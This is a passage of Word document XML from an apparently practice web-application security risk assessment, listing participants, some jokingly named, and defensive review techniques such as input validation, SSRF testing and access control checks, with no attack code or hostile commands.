          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Any Other Relevant Details:</w:t>
      </w:r>
      <w:r w:rsidRPr="00667869">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Consideration of third-party integrations, regulatory compliance requirements, and unique aspects specific to the organization's operations that could impact security.</w:t>
      </w:r>
      <w:r w:rsidR="00EA24AF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Version 10.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CCDDFA" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRPr="00667869" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="287C542B" w14:textId="77777777" w:rsidR="00667869" w:rsidRPr="00667869" w:rsidRDefault="00667869" w:rsidP="00667869">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00667869">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This assessment will employ comprehensive methodologies and tools to identify vulnerabilities, threats, and potential risks, providing a holistic understanding of the security landscape. The findings will contribute to the formulation of actionable strategies aimed at fortifying the organization's security framework and mitigating potential risks effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A9CCDB" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3824B125" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc155811454"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.  Risk Assessment Approach</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ACAC22" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6554906E" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc155811455"/>
      <w:r>
        <w:t>2.1 Participants</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="7835C45E" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>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61"/>
        <w:gridCol w:w="4963"/>
      </w:tblGrid>
      <w:tr w:rsidR="00ED747A" w14:paraId="1E5E3314" w14:textId="77777777" w:rsidTr="00667869">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
            <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="41BB4661" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4963" w:type="dxa"/>
            <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4887D75F" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Participant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED747A" w14:paraId="359BB706" w14:textId="77777777" w:rsidTr="00667869">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EDA3865" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>System Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34B24206" w14:textId="6CEF1B32" w:rsidR="00ED747A" w:rsidRDefault="00667869" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Ivan Zlatanov</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED747A" w14:paraId="54873C8E" w14:textId="77777777" w:rsidTr="00667869">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E4D8905" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Security Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F8E6360" w14:textId="45793321" w:rsidR="00ED747A" w:rsidRDefault="00667869" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t xml:space="preserve">Not Ivan Zlatanov </w:t>
            </w:r>
            <w:r w:rsidRPr="00667869">
              <w:rPr>
                <mc:AlternateContent>
                  <mc:Choice Requires="w16se">
                    <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>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r>
      <w:tr w:rsidR="00ED747A" w14:paraId="7626C369" w14:textId="77777777" w:rsidTr="00667869">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="042795C8" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Risk Assessment Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DA9CCE7" w14:textId="3FB0BB81" w:rsidR="00ED747A" w:rsidRDefault="00667869" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Elizabeth Velikova and the voices in her head</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="482378F9" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E4BC9B" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc155811456"/>
      <w:r>
        <w:t>2.2 Techniques Used</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="4924391C" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747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23"/>
        <w:gridCol w:w="5001"/>
      </w:tblGrid>
      <w:tr w:rsidR="00ED747A" w14:paraId="000392B5" w14:textId="77777777" w:rsidTr="006114D1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3623" w:type="dxa"/>
            <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0DAFC6DC" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5001" w:type="dxa"/>
            <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2B6C97AD" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00560E26">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006114D1" w14:paraId="1D024950" w14:textId="77777777" w:rsidTr="006114D1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3623" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="241FC87A" w14:textId="6446FCA2" w:rsidR="006114D1" w:rsidRDefault="006114D1" w:rsidP="006114D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006114D1">
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Manual code review and input validation assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5001" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="725AB5ED" w14:textId="75E207A5" w:rsidR="006114D1" w:rsidRDefault="006114D1" w:rsidP="006114D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006114D1">
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Thoroughly examined the application's source code, focusing on areas where user inputs are accepted. Validated and sanitized user inputs to ensure that any potentially malicious scripts or code injections are neutralized before rendering on the web page. Employed strict encoding practices to prevent the execution of injected scripts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006114D1" w14:paraId="7CD61ACD" w14:textId="77777777" w:rsidTr="006114D1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3623" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0822E1E6" w14:textId="6234BCC2" w:rsidR="006114D1" w:rsidRDefault="006114D1" w:rsidP="006114D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006114D1">
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Code analysis and secure coding practice review</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5001" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D40DFCA" w14:textId="379F9F04" w:rsidR="006114D1" w:rsidRDefault="006114D1" w:rsidP="006114D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006114D1">
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Analyzed the codebase to identify points where user inputs were directly or indirectly processed as code. Emphasized secure coding practices, avoiding functions or methods that might execute arbitrary code. Ensured that user inputs underwent stringent validation and were not used in functions prone to executing arbitrary code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006114D1" w14:paraId="703FAFFA" w14:textId="77777777" w:rsidTr="006114D1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3623" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B934A83" w14:textId="1175235C" w:rsidR="006114D1" w:rsidRDefault="006114D1" w:rsidP="006114D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006114D1">
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Configuration and penetration testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5001" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C9E4EBE" w14:textId="49FB53EA" w:rsidR="006114D1" w:rsidRDefault="006114D1" w:rsidP="006114D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006114D1">
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t xml:space="preserve">Reviewed server configurations to prevent unauthorized access to external resources. Implemented strict URL validation and allowlisting to </w:t>
            </w:r>
            <w:r w:rsidRPr="006114D1">
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>control access to approved external resources. Conducted penetration testing to simulate potential SSRF attacks and verify restrictions on external resource access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006114D1" w14:paraId="4CC2B9EB" w14:textId="77777777" w:rsidTr="006114D1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3623" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06D3D30E" w14:textId="27EA7105" w:rsidR="006114D1" w:rsidRDefault="006114D1" w:rsidP="006114D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006114D1">
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Template and input validation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006114D1">
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5001" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07546C13" w14:textId="6F50937A" w:rsidR="006114D1" w:rsidRDefault="006114D1" w:rsidP="006114D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006114D1">
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Evaluated templates and user inputs for potential vulnerabilities related to template injection. Emphasized rigorous input validation to prevent execution of template directives or code. Ensured that rendering engines and template systems were configured securely.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006114D1" w14:paraId="36AC41DD" w14:textId="77777777" w:rsidTr="006114D1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3623" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39F1765D" w14:textId="3FF96A73" w:rsidR="006114D1" w:rsidRDefault="006114D1" w:rsidP="006114D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006114D1">
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Code review and best practices assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5001" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F568EAB" w14:textId="3764D860" w:rsidR="006114D1" w:rsidRDefault="006114D1" w:rsidP="006114D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006114D1">
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Conducted a comprehensive code review to identify hardcoded credentials within the codebase. Advised for secure storage practices, such as storing credentials in environment variables or secure storage solutions, to prevent exposure of sensitive information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006114D1" w14:paraId="063E4ACF" w14:textId="77777777" w:rsidTr="006114D1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3623" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0692CC57" w14:textId="111DD905" w:rsidR="006114D1" w:rsidRDefault="006114D1" w:rsidP="006114D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006114D1">
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>File upload analysis and validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5001" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48B5EC7D" w14:textId="45530CEF" w:rsidR="006114D1" w:rsidRDefault="006114D1" w:rsidP="006114D1">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2913"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006114D1">
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Examined file upload functionalities, implemented restrictions on file types, and validated/sanitized user-provided file inputs. Ensured proper file permissions to prevent execution of uploaded files, reducing the risks associated with file upload vulnerabilities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006114D1" w14:paraId="0FDDB34E" w14:textId="77777777" w:rsidTr="006114D1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3623" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00FBE06B" w14:textId="0031F76F" w:rsidR="006114D1" w:rsidRDefault="006114D1" w:rsidP="006114D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="006114D1">
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>uthentication mechanism examination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5001" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59DD0A37" w14:textId="763E19C3" w:rsidR="006114D1" w:rsidRDefault="006114D1" w:rsidP="006114D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006114D1">
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Reviewed the application's authentication methods, emphasizing the implementation of strong authentication practices, including multi-factor authentication, robust password hashing, and secure session management to prevent identification and authentication failures.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006114D1" w14:paraId="5C332F03" w14:textId="77777777" w:rsidTr="006114D1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3623" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27E9F456" w14:textId="429F0E24" w:rsidR="006114D1" w:rsidRDefault="006114D1" w:rsidP="006114D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006114D1">
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Access control review and testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5001" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="554F3F10" w14:textId="51406427" w:rsidR="006114D1" w:rsidRDefault="006114D1" w:rsidP="006114D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006114D1">
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
              </w:rPr>
              <w:t>Evaluated access control mechanisms to ensure users were only allowed access to authorized resources. Conducted tests to verify that users were appropriately restricted based on their assigned roles, reducing the risks associated with broken access control vulnerabilities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BC335D6" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="SymbolMT" w:hAnsi="SymbolMT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AF5404A" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc155811457"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.3 Risk Model</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB01FEF" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C617D9" w14:textId="6A82DBE3" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>[Describe the risk model used in performing the risk assessment</w:t>
      </w:r>
      <w:r w:rsidR="00EA24AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128DBBC6" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62694989" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C36E5DB" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc155811458"/>
      <w:r>
        <w:t>3. System Characterization</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
